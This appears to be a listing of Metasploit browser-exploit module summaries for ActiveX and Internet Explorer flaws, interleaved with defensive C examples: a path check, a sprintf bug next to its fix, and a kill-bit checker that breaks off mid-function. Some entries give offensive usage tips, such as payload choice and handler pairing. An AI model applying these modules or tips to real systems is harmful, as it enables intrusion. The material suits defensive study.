This module exploits a stack buffer overflow in the JuniperSetupDLL.dll library which is called by the JuniperSetup.ocx ActiveX control, as part of the Juniper SSL-VPN (IVE) appliance. By specifying an overly long string to the ProductName object parameter, the stack is overwritten. CVE-2006-2086 OSVDB-25001 BID-17712 http://archives.neohapsis.com...

Kazaa Altnet Download Manager ActiveX Control Buffer Overflow
This module exploits a stack buffer overflow in the Altnet Download Manager ActiveX Control (amd4.dll) bundled with Kazaa Media Desktop 3.2.7. By sending an overly long string to the "Install()" method, an attacker may be able to execute arbitrary code. CVE-2007-5217 OSVDB-37785 http://secunia.com/advisories...

Logitech VideoCall ActiveX Control Buffer Overflow
This module exploits a stack buffer overflow in the Logitech VideoCall ActiveX Control (wcamxmp.dll 2.0.3470.448). By sending an overly long string to the "Start()" method, an attacker may be able to execute arbitrary code. CVE-2007-2918 OSVDB-36820 BID-24254

iseemedia / Roxio / MGI Software LPViewer ActiveX Control Buffer Overflow
This module exploits a stack buffer overflow in LPViewer ActiveX control (LPControll.dll 3.2.0.2). When sending an overly long string to the URL() property an attacker may be able to execute arbitrary code. CVE-2008-4384 OSVDB-48946 US-CERT-VU-848873 BID-31604

Macrovision InstallShield Update Service Buffer Overflow
This module exploits a stack buffer overflow in Macrovision InstallShield Update Service (Isusweb.dll 6.0.100.54472). By passing an overly long ProductCode string to the DownloadAndExecute method, an attacker may be able to execute arbitrary code. CVE-2007-5660 OSVDB-38347 http://lists.grok.org.uk/pipe...

Macrovision InstallShield Update Service ActiveX Unsafe Method
This module allows attackers to execute code via unsafe methods in Macrovision InstallShield 2008. CVE-2007-5660 OSVDB-38347 BID-26280

McAfee Subscription Manager Stack Buffer Overflow
This module exploits a flaw in the McAfee Subscription Manager ActiveX control. Due to an unsafe use of vsprintf, it is possible to trigger a stack buffer overflow by passing a large string to one of the COM-exposed routines, such as IsAppExpired. This vulnerability was discovered by Karl Lynn of eEye. CVE-2006-3961 OSVDB-27698 BID-19265 http://lists.grok.org.uk/pipe...

McAfee Visual Trace ActiveX Control Buffer Overflow
This module exploits a stack buffer overflow in the McAfee Visual Trace 3.25 ActiveX Control (NeoTraceExplorer.dll 1.0.0.1). By sending an overly long string to the "TraceTarget()" method, an attacker may be able to execute arbitrary code. CVE-2006-6707 OSVDB-32399 http://secunia.com/advisories...

mIRC IRC URL Buffer Overflow
This module exploits a stack buffer overflow in mIRC 6.1. By submitting an overly long and specially crafted URL to the 'irc' protocol, an attacker can overwrite the buffer and control program execution. CVE-2003-1336 OSVDB-2665 BID-8819

MS03-020 Internet Explorer Object Type
This module exploits a vulnerability in Internet Explorer's handling of the OBJECT type attribute. CVE-2003-0344 OSVDB-2967 BID-7806 MSB-MS03-020

Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution
This module exploits a vulnerability in the GDI library included with Windows XP and 2003. This vulnerability uses the 'Escape' metafile function to execute arbitrary code through the SetAbortProc procedure. This module generates a random WMF record stream for each request. CVE-2005-4560 OSVDB-21987 MSB-MS06-001 BID-16074 http://www.microsoft.com/tech... http://wvware.sourceforge.net... http://www.geocad.ru/new/site...

Internet Explorer createTextRange() Code Execution
This module exploits a code execution vulnerability in Microsoft Internet Explorer. Both IE6 and IE7 (Beta 2) are vulnerable. It corrupts memory in a way which, under certain circumstances, can lead to an invalid/corrupt table pointer dereference; EIP will point to a very remote, non-existent memory location. This module is the result of merging three different exploit submissions and has only been reliably tested against Windows XP SP2. This vulnerability was independently discovered by multiple parties. The heap spray method used by this exploit was pioneered by Skylined. CVE-2006-1359 OSVDB-24050 MSB-MS06-013 BID-17196 US-CERT-VU-876678 http://secunia.com/secunia_re... http://seclists.org/lists/bug... http://seclists.org/lists/ful... http://www.shog9.com/crashIE....

Internet Explorer VML Fill Method Code Execution
This module exploits a code execution vulnerability in Microsoft Internet Explorer using a buffer overflow in the VML processing code (VGX.dll). This module has been tested on Windows 2000 SP4, Windows XP SP0, and Windows XP SP2. CVE-2006-4868 OSVDB-28946 MSB-MS06-055 BID-20096

Internet Explorer WebViewFolderIcon setSlice() Overflow
This module exploits a flaw in the WebViewFolderIcon ActiveX control included with Windows 2000, Windows XP, and Windows 2003. This flaw was published during the Month of Browser Bugs project (MoBB #18). CVE-2006-3730 OSVDB-27110 MSB-MS06-057 BID-19030 http://browserfun.blogspot.co...

Internet Explorer Daxctle.OCX KeyFrame Method Heap Buffer Overflow Vulnerability
This module exploits a heap overflow vulnerability in the KeyFrame method of the direct animation ActiveX control. This is a port of the exploit implemented by Alexander Sotirov. CVE-2006-4777 OSVDB-28842 BID-20047 MSB-MS06-067 https://www.blackhat.com/pres...

Internet Explorer XML Core Services HTTP Request Handling
This module exploits a code execution vulnerability in Microsoft XML Core Services which exists in the XMLHTTP ActiveX control. This module is the modified version of http://www.milw0rm.com/exploits/2743 - credit to str0ke. This module has been successfully tested on Windows 2000 SP4, Windows XP SP2, Windows 2003 Server SP0 with IE6 + Microsoft XML Core Services 4.0 SP2. CVE-2006-5745 OSVDB-29425 MSB-MS06-071 BID-20915

Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP)
This module exploits a buffer overflow vulnerability in the LoadAniIcon() function in USER32.dll. The flaw can be triggered through Internet Explorer 6 and 7 by using the CURSOR style sheet directive to load a malicious .ANI file. The module can also exploit Mozilla Firefox by using a UNC path in a moz-icon URL and serving the .ANI file over WebDAV. The vulnerable code in USER32.dll will catch any exceptions that occur while the invalid cursor is loaded, causing the exploit to silently fail when the wrong target has been chosen. This vulnerability was discovered by Alexander Sotirov of Determina and was rediscovered, in the wild, by McAfee. CVE-2007-0038 OSVDB-33629 BID-23194 MSB-MS07-017 http://www.microsoft.com/tech... http://www.determina.com/secu...

Snapshot Viewer for Microsoft Access ActiveX Control Arbitrary File Download
This module allows remote attackers to place arbitrary files on a user's file system via the Microsoft Office Snapshot Viewer ActiveX Control. CVE-2008-2463 OSVDB-46749 MSB-MS08-041 BID-30114

Windows Media Encoder 9 wmex.dll ActiveX Buffer Overflow
This module exploits a stack buffer overflow in Windows Media Encoder 9. When sending an overly long string to the GetDetailsString() method of wmex.dll an attacker may be able to execute arbitrary code. CVE-2008-3008 OSVDB-47962 BID-31065 MSB-MS08-053

Microsoft Visual Studio Msmask32.ocx ActiveX Buffer Overflow
This module exploits a stack buffer overflow in Microsoft's Visual Studio 6.0. When passing a specially crafted string to the Mask parameter of the Msmask32.ocx ActiveX Control, an attacker may be able to execute arbitrary code. CVE-2008-3704 OSVDB-47475 BID-30674 MSB-MS08-070

Internet Explorer Data Binding Memory Corruption
This module exploits a vulnerability in the data binding feature of Internet Explorer. In order to execute code reliably, this module uses the .NET DLL memory technique pioneered by Alexander Sotirov and Mark Dowd. This method is used to create a fake vtable at a known location with all methods pointing to our payload. Since the .text segment of the .NET DLL is non-writable, a prefixed code stub is used to copy the payload into a new memory segment and continue execution from there. CVE-2008-4844 OSVDB-50622 BID-32721 MSB-MS08-078 http://www.microsoft.com/tech... http://taossa.com/archive/bh0...

Internet Explorer 7 CFunctionPointer Uninitialized Memory Corruption
This module exploits an error related to the CFunctionPointer function when attempting to access uninitialized memory. A remote attacker could exploit this vulnerability to corrupt memory and execute arbitrary code on the system with the privileges of the victim. CVE-2009-0075 OSVDB-51839 MSB-MS09-002

Microsoft OWC Spreadsheet HTMLURL Buffer Overflow
This module exploits a buffer overflow in Microsoft's Office Web Components. When passing an overly long string as the "HTMLURL" parameter an attacker can execute arbitrary code. CVE-2009-1534 OSVDB-56916 BID-35992 MSB-MS09-043 http://labs.idefense.com/inte...

Microsoft OWC Spreadsheet msDataSourceObject Memory Corruption
This module exploits a memory corruption vulnerability within versions 10 and 11 of the Office Web Component Spreadsheet ActiveX control. This module was based on an exploit found in the wild. CVE-2009-1136 OSVDB-55806 MSB-MS09-043 http://ahmed.obied.net/softwa... http://www.exploit-db.com/exp... http://www.microsoft.com/tech...

Internet Explorer Style getElementsByTagName Memory Corruption
This module exploits a vulnerability in the getElementsByTagName function as implemented within Internet Explorer. MSB-MS09-072 CVE-2009-3672 OSVDB-50622 BID-37085 http://www.microsoft.com/tech... http://taossa.com/archive/bh0...

Internet Explorer "Aurora" Memory Corruption
This module exploits a memory corruption flaw in Internet Explorer. This flaw was found in the wild and was a key component of the "Operation Aurora" attacks that led to the compromise of a number of high profile companies. The exploit code is a direct port of the public sample published to the Wepawet malware analysis site. The technique used by this module is currently identical to the public sample; as such, only Internet Explorer 6 can be reliably exploited. MSB-MS10-002 CVE-2010-0249 OSVDB-61697 http://www.microsoft.com/tech... http://wepawet.iseclab.org/vi...

Internet Explorer DHTML Behaviors Use After Free
This module exploits a use-after-free vulnerability within the DHTML behaviors functionality of Microsoft Internet Explorer versions 6 and 7. This bug was discovered being used in the wild and was previously known as the "iepeers" vulnerability. The name comes from Microsoft's suggested workaround to block access to the iepeers.dll file. According to Nico Waisman, "The bug itself is when trying to persist an object using the setAttribute, which ends up calling VariantChangeTypeEx with both the source and the destination being the same variant. So if you send as a variant an IDISPATCH the algorithm will try to do a VariantClear of the destination before using it. This will end up on a call to PlainRelease which derefs the reference and cleans the object." NOTE: Internet Explorer 8 and Internet Explorer 5 are not affected. CVE-2010-0806 OSVDB-62810 BID-38615 http://www.microsoft.com/tech... http://www.avertlabs.com/rese... http://eticanicomana.blogspot... MSB-MS10-018

Internet Explorer Tabular Data Control ActiveX Memory Corruption
This module exploits a memory corruption vulnerability in the Internet Explorer Tabular Data ActiveX Control. Microsoft reports that version 5.01 and 6 of Internet Explorer are vulnerable. By specifying a long value as the "DataURL" parameter to this control, it is possible to write a NUL byte outside the bounds of an array. By targeting control flow data on the stack, an attacker can execute arbitrary code. CVE-2010-0805 OSVDB-63329 BID-39025 http://www.zerodayinitiative.... MSB-MS10-018

Internet Explorer Winhlp32.exe MsgBox Code Execution
This module exploits a code execution vulnerability that occurs when a user presses F1 on a MessageBox originating from VBScript within a web page. When the user hits F1, the MessageBox help functionality will attempt to load and use a HLP file from an SMB or WebDAV (if the WebDAV redirector is enabled) server. This particular version of the exploit implements a WebDAV server that serves the HLP file as well as a payload EXE. During testing, warnings about the payload EXE being unsigned were observed. A future version of this module might use other methods that do not create such a warning. CVE-2010-0483 OSVDB-62632 MSB-MS10-023 http://www.microsoft.com/tech... http://blogs.technet.com/msrc... http://isec.pl/vulnerabilitie...

Microsoft Help Center XSS and Command Execution
Help and Support Center is the default application provided to access online documentation for Microsoft Windows. Microsoft supports accessing help documents directly via URLs by installing a protocol handler for the scheme "hcp". Due to an error in validation of input to hcp:// combined with a local cross-site scripting vulnerability and a specialized mechanism to launch the XSS trigger, arbitrary command execution can be achieved. On IE7 on XP SP2 or SP3, code execution is automatic. If WMP9 is installed, it can be used to launch the exploit automatically. With IE8 and WMP11, either can be used to launch the attack, but both pop up dialog boxes asking the user whether execution should continue. This exploit detects whether non-intrusive mechanisms are available and will use one if possible. In the case of both IE8 and WMP11, the exploit defaults to using an iframe on IE8, but this is configurable by setting the DIALOGMECH option to "none" or "player". CVE-2010-1885 OSVDB-65264 http://lock.cmpxchg8b.com/b10... http://www.microsoft.com/tech... MSB-MS10-042

Microsoft Windows Shell LNK Code Execution
This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK) that contain an icon resource pointing to a malicious DLL. This module creates a WebDAV service that can be used to run an arbitrary payload when accessed as a UNC path. CVE-2010-2568 OSVDB-66387 http://www.microsoft.com/tech...

Microsoft DirectShow (msvidctl.dll) MPEG-2 Memory Corruption
This module exploits a memory corruption vulnerability within the MSVidCtl component of Microsoft DirectShow (BDATuner.MPEG2TuneRequest). By loading a specially crafted GIF file, an attacker can overrun a buffer and execute arbitrary code. The ClassID is now configurable via an advanced option (otherwise randomized). - I)ruid CVE-2008-0015 OSVDB-55651 BID-35558 MSB-MS09-032 MSB-MS09-037 http://www.microsoft.com/tech...

Microsoft Whale Intelligent Application Gateway ActiveX Control Buffer Overflow
This module exploits a stack buffer overflow in the Microsoft Whale Intelligent Application Gateway Whale Client. When sending an overly long string to the CheckForUpdates() method of WhlMgr.dll (3.1.502.64), an attacker may be able to execute arbitrary code. CVE-2007-2238 OSVDB-53933 http://technet.microsoft.com/...

NCTAudioFile2 v2.x ActiveX Control SetFormatLikeSample() Buffer Overflow
This module exploits a stack buffer overflow in the NCTAudioFile2.Audio ActiveX Control provided by various audio applications. By sending an overly long string to the "SetFormatLikeSample()" method, an attacker may be able to execute arbitrary code. CVE-2007-0018 OSVDB-32032 BID-22196 US-CERT-VU-292713 http://lists.grok.org.uk/pipe...

Norton AntiSpam 2004 SymSpamHelper ActiveX Control Buffer Overflow
This module exploits a stack buffer overflow in Norton AntiSpam 2004. When sending an overly long string to the LaunchCustomRuleWizard() method of symspam.dll (2004.1.0.147) an attacker may be able to execute arbitrary code. CVE-2004-0363 OSVDB-6249 BID-9916

Symantec Norton Internet Security 2004 ActiveX Control Buffer Overflow
This module exploits a stack buffer overflow in the ISAlertDataCOM ActiveX Control (ISLAert.dll) provided by Symantec Norton Internet Security 2004. By sending an overly long string to the "Get()" method, an attacker may be able to execute arbitrary code. CVE-2007-1689 OSVDB-36164 http://securityresponse.syman...

Novell iPrint Client ActiveX Control Date/Time Buffer Overflow
This module exploits a stack buffer overflow in Novell iPrint Client 5.30. When passing a specially crafted date/time string via certain parameters to ienipp.ocx an attacker can execute arbitrary code. NOTE: The "operation" variable must be set to a valid command in order to reach this vulnerability. CVE-2009-1569 BID-37242 OSVDB-60804 http://secunia.com/advisories...

Novell iPrint Client ActiveX Control Buffer Overflow
This module exploits a stack buffer overflow in Novell iPrint Client 4.26. When sending an overly long string to the ExecuteRequest() property of ienipp.ocx an attacker may be able to execute arbitrary code. CVE-2008-0935 OSVDB-42063 BID-27939

Novell iPrint Client ActiveX Control Buffer Overflow
This module exploits a stack buffer overflow in Novell iPrint Client 4.34. When sending an overly long string to the GetDriverSettings() property of ienipp.ocx an attacker may be able to execute arbitrary code. CVE-2008-2908 OSVDB-46194 http://secunia.com/advisories...

Novell iPrint Client ActiveX Control target-frame Buffer Overflow
This module exploits a stack buffer overflow in Novell iPrint Client 5.30. When passing an overly long string via the "target-frame" parameter to ienipp.ocx an attacker can execute arbitrary code. NOTE: The "operation" variable must be set to a valid command in order to reach this vulnerability. CVE-2009-1568 BID-37242 OSVDB-60803 http://secunia.com/advisories...

Oracle Document Capture 10g ActiveX Control Buffer Overflow
This module exploits a stack buffer overflow in Oracle Document Capture 10g (10.1.3.5.0). Oracle Document Capture 10g comes bundled with a third-party ActiveX control, emsmtp.dll (6.0.1.0). When passing an overly long string to the method "SubmitToExpress", an attacker may be able to execute arbitrary code. CVE-2007-4607 OSVDB-38335 BID-25467 US-CERT-VU-281977

Orbit Downloader Connecting Log Creation Buffer Overflow
This module exploits a stack buffer overflow in Orbit Downloader 2.8.4. When an attacker serves up a malicious web site, arbitrary code may be executed. The PAYLOAD windows/shell_bind_tcp works best. CVE-2009-0187 OSVDB-52294 BID-33894

Persits XUpload ActiveX MakeHttpRequest Directory Traversal
This module exploits a directory traversal in Persits Software Inc's XUpload ActiveX control (version 3.0.0.3) that is included in HP LoadRunner 9.5. By passing a string containing "..\" sequences to the MakeHttpRequest method, an attacker is able to write arbitrary files to arbitrary locations on disk. Code execution occurs by writing to the All Users Startup Programs directory. You may want to combine this module with the use of multi/handler, since a user would have to log on for the payload to execute. CVE-2009-3693 OSVDB-60001 http://retrogod.altervista.or...
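The XUpload entry above, and the arbitrary-file-download entries later on this page, all come down to one missing check: a filename supplied by a web page is joined to a base directory without rejecting "..\" components, drive letters or UNC prefixes. The following is an added example written for this page, not code from Metasploit or from any of the vendors listed. It shows the path check a control such as this would need before writing; the treatment of both separators and of trailing dots and spaces follows Win32 path rules, and the function and name are this example's own.

```c
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

/* One path component, without its separator. Rejects forms that Win32 path
 * normalisation could turn into something else: a trailing '.' or ' ' is
 * stripped by the OS (so "..." or ".. " can collapse to ".."), and ':' would
 * name a drive or an alternate data stream. Caller guarantees n > 0. */
static bool component_ok(const char *c, size_t n)
{
    if (c[n - 1] == '.' || c[n - 1] == ' ')
        return false;
    for (size_t i = 0; i < n; i++)
        if (c[i] == ':')
            return false;
    return true;
}

/* Returns true only if 'rel', a Windows-style relative path as an attacker
 * could pass it to the control, cannot leave the base directory it is
 * joined with: no drive letter, no rooted or UNC path, and never more ".."
 * components than directories entered before them. Both '\' and '/' are
 * treated as separators because Win32 accepts either. */
bool path_stays_inside(const char *rel)
{
    if (rel[0] == '\0' || rel[0] == '\\' || rel[0] == '/')
        return false;                                 /* empty, rooted or UNC */
    if (((rel[0] >= 'A' && rel[0] <= 'Z') || (rel[0] >= 'a' && rel[0] <= 'z')) &&
        rel[1] == ':')
        return false;                                 /* drive-qualified */

    int depth = 0;
    const char *p = rel;
    while (*p != '\0') {
        size_t n = strcspn(p, "\\/");
        if (n == 2 && p[0] == '.' && p[1] == '.') {
            if (--depth < 0)
                return false;                         /* climbed above the base */
        } else if (n == 1 && p[0] == '.') {
            /* current directory: depth unchanged */
        } else if (n > 0) {
            if (!component_ok(p, n))
                return false;
            depth++;
        }
        p += n;
        while (*p == '\\' || *p == '/')
            p++;                                      /* skip runs of separators */
    }
    return true;
}
```

The check is deliberately lexical: it runs on the string the caller supplied, before anything touches the filesystem, so a name that only becomes dangerous after the OS normalises it ("..." or "..\x") is refused rather than canonicalised.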

RealPlayer rmoc3260.dll ActiveX Control Heap Corruption
This module exploits a heap corruption vulnerability in the RealPlayer ActiveX control. By sending a specially crafted string to the 'Console' property in the rmoc3260.dll control, an attacker may be able to execute arbitrary code. CVE-2008-1309 OSVDB-42946 BID-28157 http://secunia.com/advisories...

RealPlayer ierpplug.dll ActiveX Control Playlist Name Buffer Overflow
This module exploits a stack buffer overflow in RealOne Player V2 Gold Build 6.0.11.853 and RealPlayer 10.5 Build 6.0.12.1483. By sending an overly long string to the "Import()" method, an attacker may be able to execute arbitrary code. CVE-2007-5601 OSVDB-41430 BID-26130

RealNetworks RealPlayer SMIL Buffer Overflow
This module exploits a stack buffer overflow in RealNetworks RealPlayer 10 and 8. By creating a URL link to a malicious SMIL file, a remote attacker could overflow a buffer and execute arbitrary code. When using this module, be sure to set the URIPATH with an extension of '.smil'. This module has been tested with RealPlayer 10 build 6.0.12.883 and RealPlayer 8 build 6.0.9.584. CVE-2005-0455 OSVDB-14305 BID-12698

Roxio CinePlayer ActiveX Control Buffer Overflow
This module exploits a stack-based buffer overflow in SonicPlayer ActiveX control (SonicMediaPlayer.dll) 3.0.0.1 installed by Roxio CinePlayer 3.2. By setting an overly long value to 'DiskType', an attacker can overrun a buffer and execute arbitrary code. CVE-2007-1559 OSVDB-34779 BID-23412

SAP AG SAPgui EAI WebViewer3D Buffer Overflow
This module exploits a stack buffer overflow in the Siemens Unigraphics Solutions Teamcenter Visualization EAI WebViewer3D ActiveX control that is bundled with SAPgui. When passing an overly long string to the SaveViewToSessionFile() method, arbitrary code may be executed. CVE-2007-4475 OSVDB-53066 US-CERT-VU-985449

SoftArtisans XFile FileManager ActiveX Control Buffer Overflow
This module exploits a stack buffer overflow in SoftArtisans XFile FileManager ActiveX control (SAFmgPwd.dll 2.0.5.3). When sending an overly long string to the GetDriveName() method an attacker may be able to execute arbitrary code. CVE-2007-1682 OSVDB-47794 US-CERT-VU-914785 BID-30826

SonicWall SSL-VPN NetExtender ActiveX Control Buffer Overflow
This module exploits a stack buffer overflow in SonicWall SSL-VPN NetExtender. By sending an overly long string to the "AddRouteEntry()" method located in the NELaunchX.dll (1.0.0.26) Control, an attacker may be able to execute arbitrary code. CVE-2007-5603 OSVDB-39069 http://www.sec-consult.com/30...

Symantec Altiris Deployment Solution ActiveX Control Arbitrary File Download and Execute.
This module allows remote attackers to install and execute arbitrary files on a user's file system via AeXNSPkgDLLib.dll (6.0.0.1418). This module was tested against Symantec Altiris Deployment Solution 6.9 SP3. BID-36346 CVE-2009-3028 OSVDB-57893

Symantec Altiris Deployment Solution ActiveX Control Buffer Overflow
This module exploits a stack buffer overflow in Symantec Altiris Deployment Solution. When sending an overly long string to the RunCmd() method of AeXNSConsoleUtilities.dll (6.0.0.1426), an attacker may be able to execute arbitrary code. CVE-2009-3033 BID-37092 OSVDB-60496

Symantec AppStream LaunchObj ActiveX Control Arbitrary File Download and Execute.
This module exploits a vulnerability in Symantec AppStream Client 5.x. The vulnerability is in the LaunchObj ActiveX control (launcher.dll 5.1.0.82) containing the "installAppMgr()" method. The insecure method can be exploited to download and execute arbitrary files in the context of the currently logged-on user. CVE-2008-4388 OSVDB-51410

Symantec BackupExec Calendar Control Buffer Overflow
This module exploits a stack buffer overflow in Symantec BackupExec Calendar Control. By sending an overly long string to the "_DOWText0" property located in the pvcalendar.ocx control, an attacker may be able to execute arbitrary code. CVE-2007-6016 OSVDB-42358 BID-26904 http://secunia.com/advisories...

Symantec ConsoleUtilities ActiveX Control Buffer Overflow
This module exploits a stack buffer overflow in Symantec's ConsoleUtilities. By sending an overly long string to the "BrowseAndSaveFile()" method located in the AeXNSConsoleUtilities.dll (6.0.0.1846) Control, an attacker may be able to execute arbitrary code. CVE-2009-3031 OSVDB-59597 BID-36698 http://sotiriu.de/adv/NSOADV-... http://www.symantec.com/busin...

Husdawg, LLC. System Requirements Lab ActiveX Unsafe Method
This module allows attackers to execute code via an unsafe method in the Husdawg, LLC. System Requirements Lab ActiveX Control (sysreqlab2.dll 2.30.0.0). CVE-2008-4385 OSVDB-50122 US-CERT-VU-166651

Trend Micro OfficeScan Client ActiveX Control Buffer Overflow
This module exploits a stack buffer overflow in Trend Micro OfficeScan Corporate Edition 7.3. By sending an overly long string to the "CgiOnUpdate()" method located in the OfficeScanSetupINI.dll Control, an attacker may be able to execute arbitrary code. CVE-2007-0325 OSVDB-33040 BID-22585

Tumbleweed FileTransfer vcst_eu.dll ActiveX Control Buffer Overflow
This module exploits a stack buffer overflow in the vcst_eu.dll FileTransfer Module (1.0.0.5) ActiveX control in the Tumbleweed SecureTransport suite. By sending an overly long string as the 'remotefile' argument of the TransferFile() method, an attacker may be able to execute arbitrary code. CVE-2008-1724 OSVDB-44252 http://www.aushack.com/200708...

Ultra Shareware Office Control ActiveX HttpUpload Buffer Overflow
This module exploits a stack-based buffer overflow in Ultra Shareware's Office Control. When processing the 'HttpUpload' method, the arguments are concatenated together to form a command line to run a bundled version of cURL. If the command fails to run, a stack-based buffer overflow occurs when building the error message. This is due to the use of sprintf() without proper bounds checking. NOTE: Due to input restrictions, this exploit uses a heap-spray to get the payload into memory unmodified. CVE-2008-3878 OSVDB-47866 BID-30861 http://www.exploit-db.com/exp...

VeryPDF PDFView OCX ActiveX OpenPDF Heap Overflow
The VeryPDF PDFView ActiveX control is prone to a heap buffer-overflow because it fails to properly bounds-check user-supplied data before copying it into an insufficiently sized memory buffer. An attacker can exploit this issue to execute arbitrary code within the context of the affected application. CVE-2008-5492 OSVDB-49871 BID-32313

WebEx UCF atucfobj.dll ActiveX NewObject Method Buffer Overflow
This module exploits a stack-based buffer overflow in WebEx's WebexUCFObject ActiveX Control. If a long string is passed to the 'NewObject' method, a stack-based buffer overflow will occur when copying attacker-supplied data using the sprintf function. It is noteworthy that this vulnerability was discovered and reported by multiple independent researchers. To quote iDefense's advisory, "Before this issue was publicly reported, at least three independent security researchers had knowledge of this issue; thus, it is reasonable to believe that even more people were aware of this issue before disclosure." NOTE: Due to input restrictions, this exploit uses a heap-spray to get the payload into memory unmodified. CVE-2008-3558 OSVDB-47344 BID-30578 http://www.exploit-db.com/exp... http://labs.idefense.com/inte... http://www.trapkit.de/advisor... http://tk-blog.blogspot.com/2... http://archives.neohapsis.com... http://www.cisco.com/en/US/pr...
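Both the Ultra Shareware and WebEx entries above name the same root cause: an attacker-controlled method argument is formatted into a fixed-size stack buffer with sprintf(), which has no way to know the buffer's size. The following is an added example written for this page, not the vendors' code or the module's exploit. The buffer size, the message text and the function names are this example's own; it shows the defect pattern next to two hardened forms, a bounded format that reports truncation and a length limit applied at the COM boundary before any formatting happens.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define MSG_CAP 64   /* size of the fixed stack buffer in this example */

/* The defect pattern (illustration only, not any vendor's code): the
 * attacker-controlled method argument is formatted into a fixed-size stack
 * buffer with sprintf(), which has no notion of the buffer's size. Once
 * 'arg' is longer than the buffer, the write continues past 'msg' into the
 * saved frame. Shown for contrast; never call it with untrusted input. */
void format_error_unsafe(const char *arg)
{
    char msg[MSG_CAP];
    sprintf(msg, "Error: method failed for '%s'", arg);   /* unbounded write */
    fputs(msg, stderr);
}

/* Hardened variant: snprintf() never writes more than 'cap' bytes and
 * returns the length the full message would have needed, so the caller can
 * tell a truncated message from a complete one. Returns true when the whole
 * message fit; on truncation the output is still a NUL-terminated string. */
bool format_error_safe(char *msg, size_t cap, const char *arg)
{
    int needed = snprintf(msg, cap, "Error: method failed for '%s'", arg);
    return needed >= 0 && (size_t)needed < cap;
}

/* Better still, validate at the COM boundary: reject arguments longer than
 * the control can legitimately use before they reach any formatting code.
 * Reads at most max_len + 1 bytes, so it never scans an oversized argument
 * to its end. */
bool arg_within_limit(const char *arg, size_t max_len)
{
    size_t n = 0;
    while (arg[n] != '\0') {
        if (++n > max_len)
            return false;
    }
    return true;
}

/* Longest 'arg' that fits a buffer of 'cap' bytes together with the fixed
 * text and the terminating NUL, i.e. the bound the unsafe version breaks. */
size_t max_arg_len(size_t cap)
{
    const size_t fixed = strlen("Error: method failed for ''");
    return cap > fixed ? cap - 1 - fixed : 0;
}
```

The heap-spray note in both entries is the flip side of this bug: when the overflowed copy restricts which bytes may appear, the exploit puts its payload elsewhere in memory and only needs the overflow to redirect control, so the fix is the bounded copy and the length check, not filtering of "bad" characters.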

Winamp Playlist UNC Path Computer Name Overflow
This module exploits a vulnerability in the Winamp media player. This flaw is triggered when an audio file path is specified, inside a playlist, that consists of a UNC path with a long computer name. This module delivers the playlist via the browser. This module has only been successfully tested on Winamp 5.11 and 5.12. CVE-2006-0476 OSVDB-22789 BID-16410

Winamp Ultravox Streaming Metadata (in_mp3.dll) Buffer Overflow
This module exploits a stack buffer overflow in Winamp 5.24. By sending an overly long artist tag, a remote attacker may be able to execute arbitrary code. This vulnerability can be exploited from the browser or the winamp client itself. CVE-2008-0065 OSVDB-41707 BID-27344

WinDVD7 IASystemInfo.DLL ActiveX Control Buffer Overflow
This module exploits a stack buffer overflow in the IASystemInfo.dll ActiveX control in InterVideo WinDVD 7. By sending an overly long string to the "ApplicationType()" property, an attacker may be able to execute arbitrary code. CVE-2007-0348 OSVDB-34315 BID-23071

WinZip FileView (WZFILEVIEW.FileViewCtrl.61) ActiveX Buffer Overflow
The FileView ActiveX control (WZFILEVIEW.FileViewCtrl.61) could allow a remote attacker to execute arbitrary code on the system. The control contains several unsafe methods and is marked safe for scripting and safe for initialization. A remote attacker could exploit this vulnerability to execute arbitrary code on the victim system. WinZip 10.0 builds up to and including 6667 are vulnerable. CVE-2006-5198 OSVDB-30433 BID-21060
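The WinZip entry above states the two registry facts that decide whether any of the ActiveX controls on this page is reachable from a web page: whether the control's CLSID opts into the "safe for scripting" or "safe for initialization" component categories, and whether Internet Explorer's kill bit (bit 0x400 of "Compatibility Flags" under the ActiveX Compatibility key) has been set for it. The following is an added example for this page, not Metasploit code: it reads a .reg export of those keys and reports both facts for a given CLSID. The category IDs and the kill-bit location are Microsoft's documented values; the two CLSIDs in the sample export are constructed placeholders, not real controls.

```c
#include <ctype.h>
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Registry locations and constants as documented by Microsoft. */
#define CLSID_KEY   "HKEY_CLASSES_ROOT\\CLSID\\"
#define COMPAT_KEY  "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\"
#define CATID_SAFE_FOR_SCRIPTING    "{7DD95801-9882-11CF-9FA9-00AA006C42C4}"
#define CATID_SAFE_FOR_INITIALIZING "{7DD95802-9882-11CF-9FA9-00AA006C42C4}"
#define FLAGS_LINE   "\"Compatibility Flags\"=dword:"
#define KILLBIT_FLAG 0x400UL

struct control_status {
    bool registered;            /* CLSID\{clsid} key present */
    bool safe_for_scripting;    /* Implemented Categories\{CATID_SafeForScripting} */
    bool safe_for_init;         /* Implemented Categories\{CATID_SafeForInitializing} */
    unsigned long compat_flags; /* "Compatibility Flags" under ActiveX Compatibility */
    bool killbit;               /* bit 0x400 of compat_flags */
};

/* Registry key names are case-insensitive, so compare that way. */
static bool ieq(const char *a, const char *b)
{
    for (; *a != '\0' && *b != '\0'; a++, b++)
        if (tolower((unsigned char)*a) != tolower((unsigned char)*b))
            return false;
    return *a == '\0' && *b == '\0';
}

/* Scan a .reg export (plain text, one key per [section]) for the facts that
 * decide whether 'clsid' is reachable from a web page. */
struct control_status check_control(const char *reg, const char *clsid)
{
    struct control_status st = {0};
    char line[512], want[512];
    bool in_compat = false;

    for (const char *p = reg; *p != '\0'; ) {
        size_t full = strcspn(p, "\r\n");           /* copy one line */
        size_t n = full < sizeof line ? full : sizeof line - 1;
        memcpy(line, p, n);
        line[n] = '\0';
        p += full;
        while (*p == '\r' || *p == '\n')
            p++;

        if (line[0] == '[') {                       /* new key section */
            size_t len = strlen(line);
            if (len >= 2 && line[len - 1] == ']')
                line[len - 1] = '\0';
            const char *key = line + 1;
            snprintf(want, sizeof want, "%s%s", CLSID_KEY, clsid);
            if (ieq(key, want)) st.registered = true;
            snprintf(want, sizeof want, "%s%s\\Implemented Categories\\%s",
                     CLSID_KEY, clsid, CATID_SAFE_FOR_SCRIPTING);
            if (ieq(key, want)) st.safe_for_scripting = true;
            snprintf(want, sizeof want, "%s%s\\Implemented Categories\\%s",
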